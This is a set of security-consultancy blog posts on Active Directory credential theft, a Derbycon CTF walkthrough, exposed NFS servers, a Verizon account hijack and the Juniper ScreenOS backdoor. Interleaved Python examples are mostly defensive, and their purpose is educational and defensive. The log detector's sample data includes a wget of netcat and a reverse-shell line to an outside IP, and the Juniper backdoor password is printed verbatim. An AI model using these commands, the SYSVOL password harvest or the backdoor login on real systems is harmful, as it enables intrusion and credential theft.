Cybersecurity, Solved in 1 hour? Nope takes at least 1 Season..

Yes, we are a nation of television watchers and expect everything to be solved quickly, since most TV shows wrap everything up in an hour.

The book “Television and Politics” (readable on Google Books) makes the point that the problems our shows solve, the ones remembered as ‘calls for action’, are the ones solved by individuals.

So after a lifetime of watching these shows we may have a subconscious predisposition to assume that one person can solve most problems in a reasonable amount of time (an hour or two).

So when a complex issue is placed in front of us, such as:

Red team vs blue team, attackers vs defenders, where a series of steps breaches a server and further tools are then used to keep access to the system without the defending team’s knowledge. The solution to this issue is not obvious.

So why am I beating this horse again? Because the principle will not go away: attackers will find ways in, and they will use the very systems we run to attack us.

For example, we want to defend our SQL servers, maybe by hiding them. That will not work, because there are tools that simply ask our systems “which of you are SQL servers?” (the SQL Server Browser service answers discovery requests on UDP port 1434, and sqlcmd -L or an nmap scan just asks), and our computers dutifully answer the request.

 

Technical example: do you have a domain controller? Then it is running Active Directory, the service that runs your network and authenticates usernames and passwords.

So how do you defend against a user asking your DC (domain controller) various questions with a few commands?

Anyone with a command line can start PowerShell and ask questions (run commands) such as get-service or get-process to find out what services and processes are running on a system; with PowerShell remoting (Invoke-Command) or the ActiveDirectory module the same questions can be put to the DC itself.

Why is this important? Because an attacker can pick a service running on the system and then try to recover the credentials it runs under, with a tool such as PowerMemory (the tool originally named in the article, RWMC, is no longer supported; PowerMemory is its successor).

Here is PowerMemory’s own description:

Exploit the credentials present in files and memory

PowerMemory leverages Microsoft signed binaries to hack Microsoft operating systems.

So, you might say, how does one get command line access on a server?

Let’s say the attacker got a user to click on phishing malware, and now a command line shell is open and connects back to one of the attacker’s command and control servers. techtarget.com explains this phenomenon.

Once the hacker has a command line open (however they got it), they will try to get more access by obtaining the passwords for administrator accounts.

How do they do that? Sean Metcalf’s DEF CON 23 talk discusses several methods.

They include PowerShell tools written by attackers, such as:

PowerMemory: exploit the credentials present in files and memory

kerberoast: a series of tools for attacking MS Kerberos implementations, in particular requesting service tickets for service accounts and cracking their passwords offline

The method of obtaining passwords from places on the Microsoft server is also useful: “Finding Passwords in SYSVOL & exploiting Group Policy preferences” is a good article, by the same author, discussing the topics in the video.

The credentials can be taken from the .xml files that Group Policy Preferences write into SYSVOL. When a preference sets up a local account (a local administrator, a service logon, a scheduled task or a mapped drive), every domain-joined system that applies the policy gets that account and password, so one file yields a local password that is valid on many machines.

All domain Group Policies are stored here, readable by every authenticated domain user: \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\

So the hacker knows where to look and what to find: the .xml files with a cpassword attribute, which holds the password in an encrypted format. The encryption is AES, but Microsoft published the key in the MS-GPPREF protocol documentation, so anyone who can read the file can decrypt it; MS14-025 stopped new passwords from being stored this way but left existing files in place.
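Here is what the search for those files looks like in code, as an added example written for this post (it is not the post’s own code, nor code from any of the tools named above). It assumes SYSVOL is reachable as an ordinary directory, for example a mapped drive or a CIFS mount; the Groups.xml it scans is constructed for the demonstration and its cpassword value is made-up base64, not a real encrypted credential.

```python
"""Find Group Policy Preference XML files in SYSVOL that carry a cpassword.

Added example, not code from the original post or from any of the tools it
names. It assumes SYSVOL is reachable as an ordinary directory (a mapped
drive or a CIFS mount); the Groups.xml below is constructed and its
cpassword value is made-up base64, not a real encrypted credential.
"""
import os
import tempfile
import xml.etree.ElementTree as ET

# Preference files in which a cpassword can appear. MS14-025 stops the GPO
# editor from writing new ones but leaves existing files untouched.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Constructed sample: a Local Users and Groups preference that sets the
# password of a local account on every machine applying the policy.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="localadmin">
    <Properties action="U" newName="" fullName="" description=""
        cpassword="AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8="
        changeLogon="0" noChange="1" neverExpires="1"
        acctDisabled="0" userName="localadmin"/>
  </User>
</Groups>
"""


def find_cpasswords(sysvol_root):
    """Walk sysvol_root and return one (path, element, userName, cpassword)
    tuple per element that carries a cpassword attribute."""
    hits = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for name in files:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError:
                continue  # unparseable file; keep walking
            for elem in root.iter():
                if "cpassword" in elem.attrib:
                    hits.append((path, elem.tag, elem.get("userName", ""),
                                 elem.get("cpassword", "")))
    return hits


def demo():
    """Build a throwaway SYSVOL-like tree holding the sample file, scan it."""
    root = tempfile.mkdtemp(prefix="sysvol_")
    gpo_dir = os.path.join(root, "Policies", "{GPO-GUID}", "Machine",
                           "Preferences", "Groups")
    os.makedirs(gpo_dir)
    with open(os.path.join(gpo_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_GROUPS_XML)
    return find_cpasswords(root)


if __name__ == "__main__":
    for path, tag, user, cpw in demo():
        print(f"{path}: <{tag}> userName={user!r} cpassword={cpw[:16]}...")
```

Point it at your real SYSVOL path and every hit is a password an attacker can recover with the published key and a few lines of AES code (PowerSploit’s Get-GPPPassword does the decryption for you). Delete the setting from the preference, change the password on the affected machines, and confirm the file no longer carries the attribute.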

For those files it does not matter how strong the password is. For the password hashes the other tools recover, it now depends only on how strong your password is…

What are your password policy characteristics? Do you require long passwords, more than 14 characters? Because if you allow 14 or fewer, the hackers have an even easier time: a password of up to 14 characters can also be stored as the old LM hash, which splits it into two 7-character halves that crack in minutes (LM storage is off by default on Windows Vista/Server 2008 and later, but check the policy setting rather than assume).

So is it still easy? Can you depend on only your defense team (blue team) to keep all of your assets free of unauthorized access? It will take more than a single episode, more than a season of episodes. It will take a binge-watching marathon to keep the hackers away, and it will take red teams (ethical hackers) attacking your own systems first.

 

we can help you with a plan of security policies and red team attacks.

Contact Us.

 

 

Worried About 0Day Attacks? Take Care of 30day first!

I have been watching the Derbycon videos (put up by IronGeek) and I like Paul Coggin’s comment: are you worried about day zero attacks? You have to take care of 80 day first.

[embedded video: Derbycon 2016, Paul Coggin]

I have heard Paul’s talks before and this one at Derbycon is a bit different, but the theme is the same: do not forget the OSI Layer 2 (data link) exploits and threats. This means that Cisco devices can be attacked if they are not configured properly, which is obvious to him because he pentests Cisco routers.

 

Kind of funny as Paul says(as a side note) : “many companies are worried about Zero Day attacks but have not solved the 80 day attack”.

A zero-day attack is one that succeeds because the security flaw it uses has not been fixed yet: the vendor has had zero days to produce a patch. I have said this before, in this post from December of last year: “Zero-Day Attacks and why patching means catching up”.

It is a valid point, Paul: if our patching process is not set up correctly we are not even catching the 80-day-old vulnerability, never mind the zero-day (we cannot patch that one). Since a patch cannot exist yet for a zero-day, our effort belongs on the vulnerabilities that do have patches.

 

Derbycon had a CTF (capture the flag) competition as well: a contest built around a realistic hacker’s riddle, whose solution shows some of the thought process a hacker goes through when taking over a machine.

At Derbycon’s CTF event the test hack follows the same process a criminal hacker would use in the real world.

“Hacker process”, also called a kill chain: Recon, Analysis, Penetrate, Control. We like to call it SVAPE&C.

Walking through the hacker’s thought process as they perform their actions is important for designing better defenses.

The red team (attackers) versus the blue team (defense) is the constant in the world of computer security, which is why CTF contests exist.

I don’t want to get into too many details, but a few are necessary:

In a capture the flag contest there is a lot of network traffic that the hacker (red team) has to digest and make sense of: decide what traffic is useful and which system to review more closely.

  1. A system named HELPDESK was found (by sniffing traffic with Wireshark), and an nmap scan showed ports 139/tcp and 3456/tcp open
  2. Then nbtscan was run to pull more information (NetBIOS name, workgroup) from the system
  3. Then a ping was done, which also gives out information (the TTL in the reply hints at the operating system)
  4. Port 139 was the Microsoft NetBIOS session service (Windows file sharing)
  5. Port 3456 was odd, so ncat was run to probe it
  6. Here came the CTF oddity: the port answered like the computer in the 1983 movie “WarGames”, “WOULD YOU LIKE TO PLAY A GAME?”
  7. From here the hack moves to a different stage, reconnaissance having found the system and its open ports
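Steps 4 to 6 are a banner grab: connect to the odd port, read what it volunteers, send it something and see what comes back, which is what ncat was doing. The code below is an added example written for this post, not code from the post or from the CTF team. The target is a constructed stand-in service started in a thread on 127.0.0.1; the real box, its port 3456 and its banner are known only from the write-up, so nothing here touches a real host.

```python
"""Probe an unexpected open port the way ncat was used in the CTF write-up.

Added example, not code from the post or from the CTF team. The target is a
constructed stand-in service started in a thread on 127.0.0.1; the real box,
its port 3456 and its banner are known only from the write-up.
"""
import socket
import socketserver
import threading

BANNER = b"WOULD YOU LIKE TO PLAY A GAME?\r\n"


class GameHandler(socketserver.BaseRequestHandler):
    """Constructed stand-in for the odd service: volunteers a banner, then
    answers one line from the client and hangs up."""

    def handle(self):
        self.request.sendall(BANNER)
        data = self.request.recv(1024)
        if data.strip():
            self.request.sendall(b"A STRANGE GAME.\r\n")


def start_fake_service():
    """Listen on an ephemeral localhost port; return (server, port)."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), GameHandler)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def grab_banner(host, port, probe=b"YES\r\n", timeout=2.0):
    """Connect, read whatever the service volunteers, send one probe line and
    read the reply. Returns (state, banner, reply) with state 'open' or
    'closed'; a silent-but-open port comes back as ('open', b'', ...)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            try:
                banner = s.recv(4096)
            except socket.timeout:
                banner = b""
            s.sendall(probe)
            try:
                reply = s.recv(4096)
            except socket.timeout:
                reply = b""
            return "open", banner, reply
    except OSError:  # refused, unreachable, or timed out while connecting
        return "closed", b"", b""


def probe_ports(host, ports):
    """Run grab_banner over a list of ports; return {port: result}."""
    return {p: grab_banner(host, p) for p in ports}


def demo():
    """Start the stand-in, probe its port plus a port known to be closed."""
    srv, open_port = start_fake_service()
    # Reserve and release an ephemeral port so we have one that is closed.
    tmp = socket.socket()
    tmp.bind(("127.0.0.1", 0))
    closed_port = tmp.getsockname()[1]
    tmp.close()
    try:
        return probe_ports("127.0.0.1", [open_port, closed_port]), open_port, closed_port
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    results, _, _ = demo()
    for port, (state, banner, reply) in results.items():
        print(f"{port}/tcp {state} banner={banner!r} reply={reply!r}")
```

The distinction grab_banner draws between closed, open-and-silent and open-and-talkative is the same one the team worked through on port 3456: a service that volunteers a banner tells you what it is, and its reply to a probe line tells you how to talk to it.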

[image: tweet from the Derbycon CTF]

So as you see in the tweet, the next step was to give a programmatic response on port 3456 (even the port number is a joke, as no common service lives there). As a hacker participating in the CTF, once you saw that tweet you knew how to answer the question.

  1. The issue now was how to penetrate the box.
  2. The str$() response did not work correctly.
  3. Hackers do what they do, and “hack”: try different things until one succeeds.
  4. Through some tricks they were able to start a command.com (DOS) shell, after realizing this might be an old machine on which the new hacking tools do not work.
  5. Once the hacker can execute commands on the remote system, what happens next? It is the “control” piece.
  6. Now the hacker downloads the tools needed to truly control the machine (ncat and a registry program).
  7. From there they had to find the FlagMalwareBytes registry flag in the time allotted.

 

This particular team placed 3rd.

 

There is more to the CTF event, but at this point I want to discuss the general nature of hacking. It is true that in this case the hacker was trying to control an ancient machine (Windows 98, or even 95), but the principles are the same. In fact, because of the age of the machine the hackers had to use older tools.

The one lesson we need to take away (no matter the system) is that most intrusions at some point download tools and other items onto the system being compromised, and usually with ordinary manual commands such as ftp or wget.

So if you can review any manual tool commands running in your network, that would be good: a web server account running wget into /tmp is not normal activity. Patching the local systems for all known vulnerabilities gives you more defense against wily hackers.
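What that review looks like as a rule over process-execution logs, as an added example written for this post (not the post’s own code): the log lines are constructed, in a one-exec-per-line shape (timestamp host user cmd="...") that an EDR agent or an auditd-to-syslog pipeline might produce, so parse_line is the part to swap for your own format. It goes a little beyond the post’s ftp/wget: curl, tftp and scp are treated the same way, and the rule also weighs who ran the command and where the file lands.

```python
"""Flag interactive tool-download commands in process-execution logs.

Added example, not the post's own code. The log lines are constructed, in a
one-exec-per-line shape (timestamp host user cmd="...") that an EDR agent or
an auditd-to-syslog pipeline might produce; swap parse_line for your format.
It goes a little beyond the post's ftp/wget: curl, tftp and scp are treated
the same way, and the rule also weighs who ran it and where the file lands.
"""
import re
import shlex

DOWNLOADERS = {"wget", "curl", "ftp", "tftp", "scp", "sftp"}
SCRATCH_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody", "postgres", "mysql"}
IP_LITERAL = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) cmd="(.*)"$')

# Constructed sample: a web shell fetching netcat, a legitimate build fetch,
# an interactive ftp session by root, and ordinary admin activity.
SAMPLE_LOG = """\
2016-09-25T14:03:11Z web01 www-data cmd="wget http://203.0.113.5/nc -O /tmp/nc"
2016-09-25T14:03:40Z web01 www-data cmd="chmod +x /tmp/nc"
2016-09-25T14:05:02Z web01 www-data cmd="/tmp/nc -e /bin/sh 203.0.113.5 4444"
2016-09-25T14:10:00Z build02 jenkins cmd="curl -fsSL https://repo.corp.example/a.tgz -o /var/lib/jenkins/a.tgz"
2016-09-25T14:12:19Z db01 root cmd="ftp 203.0.113.5"
2016-09-25T14:15:33Z web01 alice cmd="ls -la /var/www"
"""


def parse_line(line):
    """One log line -> dict with ts, host, user, cmd, argv; None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, host, user, cmd = m.groups()
    return {"ts": ts, "host": host, "user": user, "cmd": cmd,
            "argv": shlex.split(cmd)}


def classify(event):
    """Return the list of reasons an exec looks like tooling being staged."""
    argv = event["argv"]
    if not argv:
        return []
    prog = argv[0].rsplit("/", 1)[-1]
    reasons = []
    if prog in DOWNLOADERS:
        reasons.append(f"download tool {prog} executed")
        if event["user"] in SERVICE_ACCOUNTS:
            reasons.append(f"run by service account {event['user']}")
        if any(a.startswith(SCRATCH_DIRS) for a in argv[1:]):
            reasons.append("destination is a scratch directory")
        if IP_LITERAL.search(" ".join(argv[1:])):
            reasons.append("remote given as a bare IP address")
    elif argv[0].startswith(SCRATCH_DIRS):
        reasons.append("program executed from a scratch directory")
    return reasons


def audit(log_text):
    """Parse every line, classify it, and return the flagged events as
    (score, event, reasons), highest score first."""
    flagged = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        reasons = classify(ev)
        if reasons:
            flagged.append((len(reasons), ev, reasons))
    flagged.sort(key=lambda t: t[0], reverse=True)
    return flagged


if __name__ == "__main__":
    for score, ev, reasons in audit(SAMPLE_LOG):
        print(f"[{score}] {ev['ts']} {ev['host']} {ev['user']}: {ev['cmd']}")
        for r in reasons:
            print("      -", r)
```

The score is just a count of reasons, which is enough to put the web server’s wget into /tmp at the top and the build server’s curl from the internal repository at the bottom; the follow-on execution of /tmp/nc is caught by the second branch, so the same rule catches the “control” step even when the download itself was missed.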

 

Contact Us to discuss this and other items regarding hackers.

 

 

 

Another Day More Attacks To Defend From

Why does it seem that we are always defending? It seems the same thing every day and every month: as the patches come out, IT departments must patch consistently and without fail.

[image: Fortinet global heat map]

Because if we do not, what happens? For example, from Fortinet’s¹ analysis, 10% of all NFS servers in the world are misconfigured so that their data is exposed to anyone on the Internet.

The global heat map shows the country most at risk is the USA, with China in second place. Notice that the largest economies have the most exposed servers.

So what does 10% mean in practice?

The fix is to upgrade to a current version of NFS (NFSv4) and enable Kerberos authentication (sec=krb5, or sec=krb5p for encryption on the wire) instead of the default AUTH_SYS, in which the server simply trusts whatever user ID the client claims, and to restrict exports to known hosts and networks rather than the whole Internet.
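The weak setting beside the corrected one, as an added example written for this post (not from the post or from Fortinet’s report): the /etc/exports content is constructed, and the checks encode the advice just given, restrict who may mount, squash root, and use Kerberos on NFSv4 rather than the default sec=sys.

```python
"""Audit /etc/exports for the weak settings behind the exposed-NFS numbers.

Added example, not from the post or from Fortinet's report. The exports
content is constructed; the checks encode the advice above: restrict who may
mount, squash root, and use Kerberos (sec=krb5*) on NFSv4 rather than the
default AUTH_SYS (sec=sys), where the server trusts the UID the client claims.
"""
import re

# Constructed sample: one weak export and its hardened forms.
SAMPLE_EXPORTS = """\
# weak: the whole Internet may mount it, remote root stays root, low source ports not required
/srv/data    *(rw,no_root_squash,insecure,sync)
# better: named network only, root squashed, Kerberos with privacy
/srv/data    10.0.5.0/24(rw,root_squash,secure,sec=krb5p,sync)
/srv/backup  backup01.corp.example(ro,sec=krb5i)
"""

CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text):
    """Return [(path, client, options)]; flag options map to True and
    key=value options to their value. A bare "(opts)" token, or no client at
    all, means everyone, which exportfs also treats as "*"."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        path, tokens = parts[0], parts[1:] or ["*"]
        for tok in tokens:
            m = CLIENT_RE.match(tok)
            client, optstr = m.group(1) or "*", m.group(2) or ""
            opts = {}
            for o in filter(None, optstr.split(",")):
                k, _, v = o.partition("=")
                opts[k] = v if v else True
            entries.append((path, client, opts))
    return entries


def audit_exports(entries):
    """Return [(path, client, reason)] for each weak setting found."""
    findings = []
    for path, client, opts in entries:
        if client == "*" or any(ch in client for ch in "*?"):
            findings.append((path, client, "mountable by any host that can reach port 2049"))
        if opts.get("no_root_squash"):
            findings.append((path, client, "no_root_squash: remote root is root on the export"))
        if opts.get("insecure"):
            findings.append((path, client, "insecure: requests accepted from unprivileged source ports"))
        secs = str(opts.get("sec", "sys")).split(":")  # sec may list several flavours
        if any(not s.startswith("krb5") for s in secs):
            findings.append((path, client, f"sec={':'.join(secs)}: server trusts the client's claimed UID; use sec=krb5p"))
        elif "krb5p" not in secs:
            findings.append((path, client, f"sec={':'.join(secs)}: Kerberos auth but no encryption on the wire; consider krb5p"))
    return findings


if __name__ == "__main__":
    for path, client, reason in audit_exports(parse_exports(SAMPLE_EXPORTS)):
        print(f"{path} {client}: {reason}")
```

Run it against your own /etc/exports (and compare with what showmount -e reports from outside your network); an export that shows up with no findings here but is still reachable from the Internet needs a firewall rule on 2049/tcp, because Kerberos restricts who can read the data but not who can probe the service.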

 

Fortinet’s researchers used the Shodan.io² search database for their data.

[image: Shodan exploits search for “nfs”]

And if one goes to the site directly, one can count 12 entries under “NFS”: 5 exploits, 4 remote, 2 DoS and 1 local.

 

There are 129 known CVEs, 7 entries in Exploit-DB and 5 known Metasploit modules.

To a hacker this is a known item.

So what can a hacker do with this information?

They will do more research to find out where those servers actually are and whether they can break in or mine information through these NFS problems:

Thousands of the exposed servers were located in the U.S. (18,843 servers), China (11,608), France (10,744), Germany (7,188) and Russia (5,269), the firm reported. This part of the Shodan/Fortinet data actually appears on the Securityintelligence.com³ IT news site.

Now we know of 18,843 + 11,608 + 10,744 + 7,188 + 5,269 = 53,652 servers susceptible to some type of attack. This is an obvious goldmine for hackers. Imagine that 10% of these exposed servers can be hacked in such a way that the hacker can run their own programs on them (root or admin privilege with command line access). So now what?

~5,400 servers may get ransomware that could gross $300 to $500 per system, which means a $1.6 mil to $2.7 mil payoff could be coming to the hackers.

What if all the servers were susceptible to ransomware? then the payoff is $16mil to $27mil.

Now do you see what the danger is from attacks? Every day brings new dangers. Don’t play cyber roulette.

[image: gun with 1000 barrels]

Every day you have a chance of firing a 500- or 1000-barrel risk gun, and one day it “goes off”: the attacker finally made it in. The chance may be 1 in 500 every day, or 1 in 1000, but it comes around.

Contact us to reduce your risk online.  Send us your email address and we will send you updates as they happen here.

 

 

  1. https://blog.fortinet.com/2016/05/30/misconfigured-nfs-servers-put-thousands-of-terabytes-of-data-at-risk
  2. https://exploits.shodan.io/?q=nfs
  3. https://securityintelligence.com/news/new-research-finds-10-percent-of-nfs-servers-globally-are-at-risk/

 

With This Hack Take Over Verizon Email Accounts

Randy Westergren¹ figured out a way to hijack a Verizon FiOS account  (FiOS is a bundled Internet, telephone, and TV service)

 

Randy was researching how FiOS email accounts were being compromised through the FiOS app, and found a problem with the reset-my-password method on the Verizon website.

With a few computer tricks (if interested check details on his site) he was able to hijack an email account.

Before we all get excited: he worked with Verizon from October 2014 until the final fix on November 3rd, 2015, so this problem is now fixed.

Here is a pictorial representation of the hijack:

[image: Verizon FiOS hack, Randy Westergren]

 

Why would I post about a fixed issue?

 

Think about it: Verizon never tested this, and even after being told about it took a year and a month to finally fix it. How many accounts were taken over in the meantime by enterprising criminal hackers with billion dollar² war chests?

Verizon has opened a new website here http://www.verizonwireless.com/landingpages/report-security-vulnerability/

Or email Verizon Security directly: CorporateSecurity@verizonwireless.com.

 

My problem with corporate methods is that decisions are not fast enough. The decisions of the corporate heads require proof, and a project, and a champion in the department, and X and Y and Z. In other words it will take a year or more to fix the problem because we are not ready.

 

How many other companies are in the same boat? Do we really have to get our email accounts hacked FIRST?

It is high time that the directors, CIOs, CTOs and CEOs of all technology companies improve the cybersecurity of their operations by setting up a test regime that is second to none. It is not enough to create a website that takes customer reports of problems.

The people with the most to lose (all the CxOs) should know exactly how much of an effort it takes to test the heck out of the technology that is online right now.

[image: system engineering as security]

Contact Me to discuss

  1. http://randywestergren.com/hijacking-verizon-fios-accounts/
  2. http://oversitesentry.com/happy-new-year-2016/

Society Wants Technology – Does Not Realize Security Implications

Everyone has heralded new improvements ever since the Renaissance of the 15th century started an artistic and scientific improvement binge that has continued every year since.

We are moving to another new year since time does not stand still for us to digest the current technology.

[image: Johannes Gutenberg] Johannes Gutenberg, small bio at physic.org

So in 1440 we were inadvertently thrust as a society into the “new age” of enlightenment, and in one sense we will forever regret it. In 1440 Mr. Gutenberg finished a hand press and printed the “Poem of the Last Judgement” and the Calendar of 1448. Ever since then, 567 years ago, we have been moving forward; admittedly things have gotten much faster with the Internet and computers. But the people of the late 15th century did not realize what was happening until many years later. As more and more books and scientific thought came to be shared on a regular basis, it changed our society forever.

 

 

Today the same thing is happening, except that when new technologies arrive and are implemented you may not notice the immediate effects, especially if you are not buying that new technology or technique. A new hacker technique made possible by a mistake can really change our lives without your knowledge. You may be completely oblivious, but it is still happening.

 

What does a Juniper hack have to do with our lives?

Network World had a story² yesterday (Dec 20); the advisory itself was first posted on Juniper’s forums, in the following manner:


Administrative Access (CVE-2015-7755) only affects ScreenOS 6.3.0r17 through 6.3.0r20. VPN Decryption (CVE-2015-7756) only affects ScreenOS 6.2.0r15 through 6.2.0r18 and 6.3.0r12 through 6.3.0r20.

We strongly recommend that all customers update their systems and apply these patched releases with the highest priority.

POSTED BY BOB WORRALL, SVP CHIEF INFORMATION OFFICER ON DECEMBER 17, 2015

 


 

But how long has this vulnerability actually been out in the wild?

Let’s look at the CVE entry for CVE-2015-7755.

Notice the note in the CVE:

20151008 Disclaimer: The entry creation date may reflect when the CVE-ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

So the CVE ID was reserved on October 8th 2015, more than two months before the advisory; the disclaimer is there precisely because that date need not be the discovery or disclosure date.

And according to Network World’s report on the FBI/DHS investigation, the backdoor itself dates back about 3 years.

Today the Internet Storm Center has taken the unusual step of declaring Threat Level Yellow because of Juniper’s vulnerability: isc.sans.edu³

[image: Internet Storm Center, December 21st, threat level yellow]

 

Needless to say, if you have a Juniper firewall or VPN gateway running ScreenOS 6.2 or 6.3 at one of the listed releases, you are vulnerable to unauthorized administrative login over telnet/SSH (any valid username with the backdoor password) and/or to the VPN decryption backdoor.

 

Just in case you missed it, the backdoor password is: <<< %s(un='%s') = %u

If that password logs you into one of your own devices (with any valid username) you know you are susceptible. Test only devices you are authorized to test, and apply Juniper’s patched release either way; the password check is a confirmation, not a substitute for the version check.
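Both checks in code, as an added example written for this post (not from the post or from Juniper): the version ranges are the ones quoted from the advisory above, and the telnet session bytes are constructed. Only a plaintext (telnet) session can be checked on the wire like this; over SSH the password is encrypted, so there the version is what you check.

```python
"""Check a ScreenOS build against the ranges in Juniper's advisory and look
for the CVE-2015-7755 backdoor password in a captured telnet session.

Added example, not from the post or from Juniper. The version ranges are the
ones quoted from the advisory above; the telnet bytes are constructed. Only a
plaintext (telnet) session can be checked on the wire like this; over SSH the
password is encrypted, so there the check is the version.
"""
import re

# (base release, first affected build, last affected build), per the advisory
AFFECTED = {
    "CVE-2015-7755": [((6, 3, 0), 17, 20)],                       # admin access
    "CVE-2015-7756": [((6, 2, 0), 15, 18), ((6, 3, 0), 12, 20)],  # VPN decryption
}
# e.g. "6.3.0r18" or the "6.3.0r18.0" form that `get system` prints
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)r(\d+)(?:\.\d+)?$")

# The published backdoor password; accepted with any valid username on the
# telnet/SSH admin interface of an affected build.
BACKDOOR_PASSWORD = b"<<< %s(un='%s') = %u"


def parse_screenos_version(text):
    """'6.3.0r18' -> ((6, 3, 0), 18); ValueError for anything else."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"not a ScreenOS version: {text!r}")
    a, b, c, build = (int(x) for x in m.groups())
    return (a, b, c), build


def affected_cves(version_text):
    """CVE IDs from the advisory that apply to this build, in advisory order."""
    base, build = parse_screenos_version(version_text)
    return [cve for cve, ranges in AFFECTED.items()
            if any(base == rb and lo <= build <= hi for rb, lo, hi in ranges)]


def find_backdoor_password(stream):
    """Byte offsets at which the backdoor password occurs in a raw stream."""
    hits, start = [], 0
    while True:
        i = stream.find(BACKDOOR_PASSWORD, start)
        if i < 0:
            return hits
        hits.append(i)
        start = i + 1


# Constructed telnet session: any username, the backdoor password, then the
# firmware version as `get system` would show it.
SAMPLE_TELNET = (b"login: netscreen\r\npassword: " + BACKDOOR_PASSWORD + b"\r\n"
                 b"fw-edge-> get system\r\nSoftware Version: 6.3.0r18.0\r\n")


def assess_capture(stream):
    """Combine both checks on one capture: (backdoor offsets, affected CVEs)."""
    offsets = find_backdoor_password(stream)
    m = re.search(rb"Software Version: (\S+?)[,\r\n]", stream)
    cves = affected_cves(m.group(1).decode()) if m else []
    return offsets, cves


if __name__ == "__main__":
    offsets, cves = assess_capture(SAMPLE_TELNET)
    print("backdoor password seen at offsets:", offsets)
    print("affected by:", cves or "nothing in the advisory ranges")
```

Feed find_backdoor_password the reassembled TCP payload of telnet sessions to your ScreenOS devices (a successful login right after it is the event to alert on), and feed affected_cves the version string from each device’s `get system` output; a build outside both ranges still deserves the patched release, since the advisory ranges describe where the backdoors are, not where they are safe to ignore.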

 

Back to my original point: we don’t realize for months that there is a new technique that could give hackers access to our devices. In this day and age the pace of technology change is down to months, not years, and hackers know this. The criminals are aware of the problems that new technologies can bring, even if you are not.

What can you do besides being vigilant?

Create an atmosphere of constant improvement; set up log analysis and review your logs with better methods weekly, preferably, but monthly at a minimum.

As in my previous post:  http://oversitesentry.com/what-to-look-for-in-logs-hackers-being-successful/

[image: cybersecurity log analysis]

 

Contact Us to discuss

 

 

 

 

2. http://www.networkworld.com/article/3016802/security/fbi-dhs-investigating-juniper-hack-secret-backdoor-dates-back-3-years.html

3. https://isc.sans.edu/